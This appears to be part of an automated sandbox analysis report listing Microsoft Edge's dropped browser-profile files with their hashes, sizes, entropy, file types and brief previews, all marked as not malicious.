                                                                                                                                                                                                                                                                                  MD5:2BAA14695EE44D3C8E093174D3C5AE54
                                                                                                                                                                                                                                                                                  SHA1:817D0598DA674EBCF4D2C5A47C1435C2DCB9971F
                                                                                                                                                                                                                                                                                  SHA-256:9DAB0DE7D66328FB61E97F9EB8B9F1A3597FD92D310757416118C674F6BA1A1E
                                                                                                                                                                                                                                                                                  SHA-512:758F6EA4BCD45599680C454C960272C19FB69443C34AFFDE52475F07412978D025E4F3612B9F14A50E70C69F651FEAB43CD01B1C96EF2E4AF3B29FDE2DC99930
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.039866332631596356
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:JF0EbZmqvD3KX70JEa3Xxx7uqZGXPtg34N+hHBNE6nrm1gQMzXAjn8y08Tcm2RGY:j0EZ1e18xFhhxGgXXC08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:05587853A0E289263433CC22B500A404
                                                                                                                                                                                                                                                                                  SHA1:BAB62AB008D9EDD154E45B5D200F239DB161F6F5
                                                                                                                                                                                                                                                                                  SHA-256:B2230B45D9F3A28C9700B16158AA06414A48C5DC1D8379732FF8B3A016B83149
                                                                                                                                                                                                                                                                                  SHA-512:BC29687A281BFC4BF34A53B66F44880AB28FE6D4C5B7BB4E00F4EFC477BB13CC49C86C0A762F44C207ECE58A2586CAA342A3F34007EFEF3437FB11D6AC3E9CC4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3553968406659012
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                                                                                                                  MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                                                                                                                  SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                                                                                                                  SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                                                                                                                  SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.051141892342046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj12tll:o1//BVsJDG2YqCX
                                                                                                                                                                                                                                                                                  MD5:0E7D6A6182C1D335B1771C6875526753
                                                                                                                                                                                                                                                                                  SHA1:FC33DB69F45C332345E79DE7648A9E8D8C026507
                                                                                                                                                                                                                                                                                  SHA-256:F5F0335CD18CDFF2B6DEAA942B958D7F5A2948CADE4D1FAAFDC3C7264F652E29
                                                                                                                                                                                                                                                                                  SHA-512:A88DE7AF4DA2575F1A6FEC2E553E0498DB3ED9AEC0AFBE9DC7BF2853F799E9B83FC17837BB6BAFA21528D4CB654F61EFD53A232AC3C11EC71F241809B800EB5F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13769
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.225058029253095
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzG6ID+CXY/3M8tpj+FVAtOVJj1f:sVeLAoxuJJzGt+rpUVyOVj
                                                                                                                                                                                                                                                                                  MD5:CACB6EE2888AFE0DFC456C1C68F4B41B
                                                                                                                                                                                                                                                                                  SHA1:C54DB113758E0853EE7330540A52C5B875601DAB
                                                                                                                                                                                                                                                                                  SHA-256:5D0B73E52FDEAE8D4CABE151A77776C3DFEFC617CCD14CB612C7C053471167CD
                                                                                                                                                                                                                                                                                  SHA-512:310BB545D1F82BFF06211BEED2C75F2F8C491C68FE537A9ED4814C8FED9173502306CC619F9F260033D33DD0A36D539517A2C860F1D6D1D5D81EAE86F78B9D69
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.567282184725223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:m7dZSEWPCkfeR8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkBf1Lrw/ypAtuY:m7dZSEWPCkfeRu1jad51ABtj
                                                                                                                                                                                                                                                                                  MD5:B8270858B92A4BA2284596202EAF73C7
                                                                                                                                                                                                                                                                                  SHA1:88AB3FE54B5FC7F7529C8A8102E0D108D2B3F93A
                                                                                                                                                                                                                                                                                  SHA-256:EB98C0DFBDCC65C234672D2C9B131313159A937C5241F3FBFC6B0C01714A1EB2
                                                                                                                                                                                                                                                                                  SHA-512:86530EC8FFF03D989072D54DD87A6272858A721DEC429239248A012DF91BC67DE7AB9A9FCACA43EFFC8E2C487DA114E81BB60E069A392C815CFB994FB3FDF59C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13731
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.225739965235268
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzG6ID+CXY/3M8tpj+FVA1OqJj1f:sVeLAoxuJJzGt+rpUVGOqj
                                                                                                                                                                                                                                                                                  MD5:31E9C982ECC575412F351FCBB2D2F93A
                                                                                                                                                                                                                                                                                  SHA1:1C53852FCC1932193EEE929EF78EFD4B6327B4F3
                                                                                                                                                                                                                                                                                  SHA-256:980BBC14E48516B7BF02D5E7BA51AB6113A1968B22ED9E181BFD3015CCEC9A1F
                                                                                                                                                                                                                                                                                  SHA-512:1489D6A7BFA31C1B764B6A94889A595A4E7FC199576B3067AE69E720DB8D8F21F3831294C8B3621C4FD77BA28481D4F7F2E5E047FE6CE55A5A2CB73245B7D457
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12421
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0583951451496
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzGaY/3M8tpj+FVAGOHJj1f:sVeLAoxuJJzGhpUVFOHj
                                                                                                                                                                                                                                                                                  MD5:E268FBBAEBE733885CA9D4A17CF9F7E9
                                                                                                                                                                                                                                                                                  SHA1:46956FD685C00360F3862023A6BD650534238D7C
                                                                                                                                                                                                                                                                                  SHA-256:6CB33BB115A722B91AEDF94EB3B8CBE9A189A8FF94ACA96105E3E7AB1ADE7D10
                                                                                                                                                                                                                                                                                  SHA-512:5BFDA37E4B88CB805F71061D66F4050462CC1E030640A86C9777B3A6A76574109EAE28EB506960104A3D67C3A2B9F58611B60A5AF9F27F8966C5D3DF58937C6E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):1695826
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.041130491204814
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24576:NPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:NPfZ/mS5
                                                                                                                                                                                                                                                                                  MD5:8C93F8137F910A217A2E04472D7BF2E0
                                                                                                                                                                                                                                                                                  SHA1:E670843690F2CE7F5C063482DE1A35881356DD93
                                                                                                                                                                                                                                                                                  SHA-256:ED04733D97B4798078B299B27402D7029407A2F2621E422E0C353354F431BA1A
                                                                                                                                                                                                                                                                                  SHA-512:A9D159C17B6D05ECEA6F1D08552E2E4CB8B12560C124653873B2CDBC84F2DE56358BCAB5E95B0FE335A0376105E2FBA00263E4857D47A45D789CC888F29F6E97
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):293
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.099698946546919
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7xXhq1wkn23oH+Tcwt9Eh1ZB2KLlpGq2Pwkn23oH+Tcwt9Eh1tIFUv:7xXh1fYeb9Eh1ZFLTGvYfYeb9Eh16FUv
                                                                                                                                                                                                                                                                                  MD5:23ED81DE7AA96B370A734316D93C2D27
                                                                                                                                                                                                                                                                                  SHA1:7E5764F6CD5EA57C6F7BED97E0878131A28C8A5C
                                                                                                                                                                                                                                                                                  SHA-256:DAC18BB7B4175D555DF6F59F162A2014AAC956859BF81858C9967DFA1807F902
                                                                                                                                                                                                                                                                                  SHA-512:F0F860690035F1ACDAED48200C1E51C56C259066A64FACC757168177A2D89F354EFC1B65F7116A2A855E50553294B656E9FBD1A9C5A39D8E001E29F2F3A466E8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:35.457 20f0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2024/12/10-12:41:35.586 20f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                                                                                  MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                                                                                  SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                                                                                  SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                                                                                  SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                                  MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                                  SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                                  SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                                  SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                                  MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                                  SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                                  SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                                  SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlJSJ/ll:Ls36ll
                                                                                                                                                                                                                                                                                  MD5:CEE320ABC955E8B38D231B149030967A
                                                                                                                                                                                                                                                                                  SHA1:40FD02E20AFC47D19FD33E27F51F601FD1333539
                                                                                                                                                                                                                                                                                  SHA-256:86A3704DB9B4E9561403845527D6438D2E61FBEE07809DAFCFA75C97F42C997A
                                                                                                                                                                                                                                                                                  SHA-512:F3DAF9F18969F676A17D83C9562781C22F7D77BED8BFB6D044625702910505C3F52D26BF2A131BE2AE9AF8D80A03C438E27BA880D1CA63EF4047464F3D16B9A6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):33
